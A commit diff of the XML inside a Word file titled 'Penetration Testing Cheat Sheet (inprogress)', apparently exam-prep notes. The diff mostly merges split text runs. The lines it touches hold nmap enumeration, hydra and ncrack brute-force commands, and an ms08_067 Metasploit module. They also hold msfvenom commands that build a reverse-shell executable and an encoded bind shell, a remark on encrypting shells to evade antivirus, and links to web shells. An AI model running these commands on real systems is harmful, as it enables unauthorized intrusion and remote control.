<commit_message>
added pdf to view online
</commit_message>
<xml_diff>
--- a/Penetration Testing Tools.docx
+++ b/Penetration Testing Tools.docx
@@ -6,6 +6,8 @@
       <w:pPr>
         <w:jc w:val="center"/>
       </w:pPr>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
       <w:r>
         <w:t>Penetration Testing Cheat Sheet (inprogress)</w:t>
       </w:r>
@@ -25,10 +27,7 @@
         <w:contextualSpacing/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Nmap </w:t>
-      </w:r>
-      <w:r>
-        <w:t>- telnet, ssh, rpc, smb, http, general vulns, etc</w:t>
+        <w:t>Nmap - telnet, ssh, rpc, smb, http, general vulns, etc</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -65,10 +64,7 @@
         <w:contextualSpacing/>
       </w:pPr>
       <w:r>
-        <w:t>masscan &amp; http scr</w:t>
-      </w:r>
-      <w:r>
-        <w:t>eenshot - quickly scan target and screenshot all directories</w:t>
+        <w:t>masscan &amp; http screenshot - quickly scan target and screenshot all directories</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -119,10 +115,7 @@
         <w:contextualSpacing/>
       </w:pPr>
       <w:r>
-        <w:t>Brup Suite - http/https scanning, parameter injection(LFI&amp;RFI), sessio</w:t>
-      </w:r>
-      <w:r>
-        <w:t>n, XXS</w:t>
+        <w:t>Brup Suite - http/https scanning, parameter injection(LFI&amp;RFI), session, XXS</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -225,10 +218,7 @@
         <w:contextualSpacing/>
       </w:pPr>
       <w:r>
-        <w:t>ftp-proftpd-backdoor.nse, ftp-vsftpd-backd</w:t>
-      </w:r>
-      <w:r>
-        <w:t>oor.nse, ftp-vuln-cve2010-4221.nse</w:t>
+        <w:t>ftp-proftpd-backdoor.nse, ftp-vsftpd-backdoor.nse, ftp-vuln-cve2010-4221.nse</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -380,10 +370,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>nmap -sU -sS --script</w:t>
-      </w:r>
-      <w:r>
-        <w:t>=smb-enum-users -p U:137,T:139 192.168.11.200-254</w:t>
+        <w:t>nmap -sU -sS --script=smb-enum-users -p U:137,T:139 192.168.11.200-254</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -500,10 +487,7 @@
         <w:contextualSpacing/>
       </w:pPr>
       <w:r>
-        <w:t>nmap -sV -p 161 --script=snmp-info TARGE</w:t>
-      </w:r>
-      <w:r>
-        <w:t>T-SUBNET  ←----- SNMPv3</w:t>
+        <w:t>nmap -sV -p 161 --script=snmp-info TARGET-SUBNET  ←----- SNMPv3</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -599,10 +583,7 @@
         <w:contextualSpacing/>
       </w:pPr>
       <w:r>
-        <w:t>oscanner -s &lt;ip&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> -P 1521</w:t>
+        <w:t>oscanner -s &lt;ip&gt; -P 1521</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -664,14 +645,7 @@
             <w:color w:val="1155CC"/>
             <w:u w:val="single"/>
           </w:rPr>
-          <w:t>https</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:color w:val="1155CC"/>
-            <w:u w:val="single"/>
-          </w:rPr>
-          <w:t>://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#finger-a-specific-username</w:t>
+          <w:t>https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#finger-a-specific-username</w:t>
         </w:r>
       </w:hyperlink>
       <w:r>
@@ -707,10 +681,7 @@
         <w:contextualSpacing/>
       </w:pPr>
       <w:r>
-        <w:t>nmap -p 1433 -sU --</w:t>
-      </w:r>
-      <w:r>
-        <w:t>script=ms-sql-info.nse 192.168.1.108 192.168.1.156</w:t>
+        <w:t>nmap -p 1433 -sU --script=ms-sql-info.nse 192.168.1.108 192.168.1.156</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -780,10 +751,7 @@
         <w:contextualSpacing/>
       </w:pPr>
       <w:r>
-        <w:t>./testss</w:t>
-      </w:r>
-      <w:r>
-        <w:t>l.sh -e -E -f -p  -S -P -c -H -U TARGET-HOST &gt; OUTPUT-FILE.html</w:t>
+        <w:t>./testssl.sh -e -E -f -p  -S -P -c -H -U TARGET-HOST &gt; OUTPUT-FILE.html</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -933,8 +901,6 @@
     <w:p>
       <w:r>
         <w:tab/>
-      </w:r>
-      <w:r>
         <w:t>WordPress/Jumla Web/PHP/Redis Applications</w:t>
       </w:r>
     </w:p>
@@ -1149,10 +1115,7 @@
         <w:contextualSpacing/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve"> ncrack -vv --user offsec -P password-file.txt rd</w:t>
-      </w:r>
-      <w:r>
-        <w:t>p://10.11.1.35</w:t>
+        <w:t xml:space="preserve"> ncrack -vv --user offsec -P password-file.txt rdp://10.11.1.35</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1210,10 +1173,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.</w:t>
-      </w:r>
-      <w:r>
-        <w:t>XXX pop3 -V</w:t>
+        <w:t>hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX pop3 -V</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1322,13 +1282,7 @@
         <w:contextualSpacing/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">NVD - search patches, cve, </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">and </w:t>
-      </w:r>
-      <w:r>
-        <w:t>applications for cve details, has patch info, similar Mitre</w:t>
+        <w:t>NVD - search patches, cve, and applications for cve details, has patch info, similar Mitre</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1407,10 +1361,7 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve">  </w:t>
-      </w:r>
-      <w:r>
-        <w:t>- “searchsploit” command 38147 exploits</w:t>
+        <w:t xml:space="preserve">  - “searchsploit” command 38147 exploits</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1429,16 +1380,7 @@
           <w:szCs w:val="18"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F2F6F8"/>
         </w:rPr>
-        <w:t>search</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F2F6F8"/>
-        </w:rPr>
-        <w:t>sploit --colour -t php 5 | grep -vi '/dos/\|\.php[^$]' | grep -i '5\.\(5\|x\)' - searching for 5.x and 5.5 exploits for “php”</w:t>
+        <w:t>searchsploit --colour -t php 5 | grep -vi '/dos/\|\.php[^$]' | grep -i '5\.\(5\|x\)' - searching for 5.x and 5.5 exploits for “php”</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2066,10 +2008,7 @@
     <w:p>
       <w:r>
         <w:tab/>
-        <w:t>Someti</w:t>
-      </w:r>
-      <w:r>
-        <w:t>mes your exploits will be too big to run in memory to do a file transfer.  use “upx -9 &lt;file&gt;” to compress files for file transfer.  Use “</w:t>
+        <w:t>Sometimes your exploits will be too big to run in memory to do a file transfer.  use “upx -9 &lt;file&gt;” to compress files for file transfer.  Use “</w:t>
       </w:r>
       <w:hyperlink r:id="rId21">
         <w:r>
@@ -2077,14 +2016,7 @@
             <w:color w:val="1155CC"/>
             <w:u w:val="single"/>
           </w:rPr>
-          <w:t>https://github.com/reider-roque/pe</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:color w:val="1155CC"/>
-            <w:u w:val="single"/>
-          </w:rPr>
-          <w:t>ntest-tools/tree/master/shells</w:t>
+          <w:t>https://github.com/reider-roque/pentest-tools/tree/master/shells</w:t>
         </w:r>
       </w:hyperlink>
       <w:r>
@@ -2096,14 +2028,7 @@
             <w:color w:val="1155CC"/>
             <w:u w:val="single"/>
           </w:rPr>
-          <w:t>https://github.com/Pashkela/Cfm_Shell_v3.0_edition/bl</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:color w:val="1155CC"/>
-            <w:u w:val="single"/>
-          </w:rPr>
-          <w:t>ob/master/shell.cfm</w:t>
+          <w:t>https://github.com/Pashkela/Cfm_Shell_v3.0_edition/blob/master/shell.cfm</w:t>
         </w:r>
       </w:hyperlink>
       <w:r>
@@ -2164,10 +2089,7 @@
         <w:contextualSpacing/>
       </w:pPr>
       <w:r>
-        <w:t>Encrypting Shells to avoid AV - (35/70)  instead of (50/70</w:t>
-      </w:r>
-      <w:r>
-        <w:t>) being caught</w:t>
+        <w:t>Encrypting Shells to avoid AV - (35/70)  instead of (50/70) being caught</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2258,10 +2180,7 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:t>msfvenom -a x86 --pl</w:t>
-      </w:r>
-      <w:r>
-        <w:t>atform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -f python</w:t>
+        <w:t>msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -f python</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2299,10 +2218,7 @@
         <w:ind w:left="720"/>
       </w:pPr>
       <w:r>
-        <w:t>msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.5 LPORT=4444 -f exe</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> -o shell_reverse.exe</w:t>
+        <w:t>msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.5 LPORT=4444 -f exe -o shell_reverse.exe</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2335,21 +2251,14 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_r1gys984s4ur" w:colFirst="0" w:colLast="0"/>
-      <w:bookmarkEnd w:id="0"/>
+      <w:bookmarkStart w:id="1" w:name="_r1gys984s4ur" w:colFirst="0" w:colLast="0"/>
+      <w:bookmarkEnd w:id="1"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t xml:space="preserve">FIREWALLS - </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>OPENING PORTS</w:t>
+        <w:t>FIREWALLS - OPENING PORTS</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2370,8 +2279,8 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_dclj5475tw31" w:colFirst="0" w:colLast="0"/>
-      <w:bookmarkEnd w:id="1"/>
+      <w:bookmarkStart w:id="2" w:name="_dclj5475tw31" w:colFirst="0" w:colLast="0"/>
+      <w:bookmarkEnd w:id="2"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="26"/>
@@ -2388,10 +2297,7 @@
         <w:t>Important:</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> If you are a member of the Administrators group, run the commands from a command prompt. To start a command prompt, find the icon or Start menu entry that you use to start a co</w:t>
-      </w:r>
-      <w:r>
-        <w:t>mmand prompt session.</w:t>
+        <w:t xml:space="preserve"> If you are a member of the Administrators group, run the commands from a command prompt. To start a command prompt, find the icon or Start menu entry that you use to start a command prompt session.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2413,8 +2319,8 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_kjb1wheeptre" w:colFirst="0" w:colLast="0"/>
-      <w:bookmarkEnd w:id="2"/>
+      <w:bookmarkStart w:id="3" w:name="_kjb1wheeptre" w:colFirst="0" w:colLast="0"/>
+      <w:bookmarkEnd w:id="3"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="26"/>
@@ -2431,22 +2337,13 @@
         <w:t>Important:</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> If you are a member of the Administrators group, and User Account Control is enabled on your </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">computer, run the commands from a command prompt with elevated permissions. To start a command prompt with elevated permissions, find the icon or Start menu entry that you use to start a command prompt session, right-click it, and then click </w:t>
+        <w:t xml:space="preserve"> If you are a member of the Administrators group, and User Account Control is enabled on your computer, run the commands from a command prompt with elevated permissions. To start a command prompt with elevated permissions, find the icon or Start menu entry that you use to start a command prompt session, right-click it, and then click </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>Run as adminis</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>trator</w:t>
+        <w:t>Run as administrator</w:t>
       </w:r>
       <w:r>
         <w:t>.</w:t>
@@ -2763,10 +2660,7 @@
       </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>use exploit/windows/s</w:t>
-      </w:r>
-      <w:r>
-        <w:t>mb/ms08_067_netapi</w:t>
+        <w:t>use exploit/windows/smb/ms08_067_netapi</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2807,10 +2701,7 @@
         <w:ind w:left="720" w:firstLine="720"/>
       </w:pPr>
       <w:r>
-        <w:t>/usr/share/exploitdb/platforms/windows/remote/66.c &lt;- ms03-02</w:t>
-      </w:r>
-      <w:r>
-        <w:t>6</w:t>
+        <w:t>/usr/share/exploitdb/platforms/windows/remote/66.c &lt;- ms03-026</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2889,10 +2780,7 @@
     <w:p>
       <w:r>
         <w:tab/>
-        <w:t>ftp m</w:t>
-      </w:r>
-      <w:r>
-        <w:t>achinename</w:t>
+        <w:t>ftp machinename</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2900,16 +2788,7 @@
         <w:ind w:left="720"/>
       </w:pPr>
       <w:r>
-        <w:t>At times you may wish to copy files from a remote machine on which you do not have a loginname. This can be done using anonymous FTP.  When the remote machine asks for your loginname, you should type in the word anonymous. Instead of a password,</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> you should enter your own electronic mail address. This allows the remote site to keep records of the anonymous FTP requests.  Once you have been logged in, you are in the anonymous directory for the remote machine. This usually contains a number of publi</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c files and directories. Again you should be able to move around in these directories. However, you are only able to copy the files from the remote machine to your own local machine; you are not able to write on the remote machine or to delete any files th</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ere</w:t>
+        <w:t>At times you may wish to copy files from a remote machine on which you do not have a loginname. This can be done using anonymous FTP.  When the remote machine asks for your loginname, you should type in the word anonymous. Instead of a password, you should enter your own electronic mail address. This allows the remote site to keep records of the anonymous FTP requests.  Once you have been logged in, you are in the anonymous directory for the remote machine. This usually contains a number of public files and directories. Again you should be able to move around in these directories. However, you are only able to copy the files from the remote machine to your own local machine; you are not able to write on the remote machine or to delete any files there</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3126,14 +3005,7 @@
             <w:color w:val="1155CC"/>
             <w:u w:val="single"/>
           </w:rPr>
-          <w:t>https://highon.coffee/blog/walk</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:color w:val="1155CC"/>
-            <w:u w:val="single"/>
-          </w:rPr>
-          <w:t>throughs/</w:t>
+          <w:t>https://highon.coffee/blog/walkthroughs/</w:t>
         </w:r>
       </w:hyperlink>
       <w:r>
@@ -3191,14 +3063,7 @@
             <w:color w:val="1155CC"/>
             <w:u w:val="single"/>
           </w:rPr>
-          <w:t>https://community.rapid7.com/community/metasploit/blog/2012</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:color w:val="1155CC"/>
-            <w:u w:val="single"/>
-          </w:rPr>
-          <w:t>/06/12/introducing-metasploitable-2</w:t>
+          <w:t>https://community.rapid7.com/community/metasploit/blog/2012/06/12/introducing-metasploitable-2</w:t>
         </w:r>
       </w:hyperlink>
       <w:r>
@@ -3355,14 +3220,7 @@
             <w:color w:val="1155CC"/>
             <w:u w:val="single"/>
           </w:rPr>
-          <w:t>https://highon.coffee/blog/rev</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:color w:val="1155CC"/>
-            <w:u w:val="single"/>
-          </w:rPr>
-          <w:t>erse-shell-cheat-sheet/</w:t>
+          <w:t>https://highon.coffee/blog/reverse-shell-cheat-sheet/</w:t>
         </w:r>
       </w:hyperlink>
       <w:r>
@@ -3513,8 +3371,6 @@
       <w:r>
         <w:tab/>
       </w:r>
-      <w:bookmarkStart w:id="3" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="3"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3558,13 +3414,6 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
         <w:t>nmap -sV --script=http-enum &lt;target&gt;</w:t>
       </w:r>
     </w:p>
@@ -3763,16 +3612,7 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>Features in other tools that utilize either forbidden or restricted exam li</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="555555"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>mitations</w:t>
+        <w:t>Features in other tools that utilize either forbidden or restricted exam limitations</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3792,10 +3632,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>You may however, use tools such as Nmap (and its scripting engine), Nikto, Burp Free, DirBuster etc. against any</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> of your target systems.</w:t>
+        <w:t>You may however, use tools such as Nmap (and its scripting engine), Nikto, Burp Free, DirBuster etc. against any of your target systems.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9349,7 +9186,7 @@
 </file>
 
 <file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
-<sisl xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns="http://www.boldonjames.com/2008/01/sie/internal/label" sislVersion="0" policy="cde53ac1-bf5f-4aae-9cf1-07509e23a4b0" origin="userSelected"/>
+<sisl xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns="http://www.boldonjames.com/2008/01/sie/internal/label" sislVersion="0" policy="cde53ac1-bf5f-4aae-9cf1-07509e23a4b0" origin="defaultValue"/>
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
@@ -9362,7 +9199,7 @@
 </file>
 
 <file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{DBB0EF9A-D827-43C6-98A6-367FDF9C14DF}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{60C7F7BE-8E96-421B-9299-46E4FF0FD5F8}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://www.w3.org/2001/XMLSchema"/>
     <ds:schemaRef ds:uri="http://www.boldonjames.com/2008/01/sie/internal/label"/>

</xml_diff>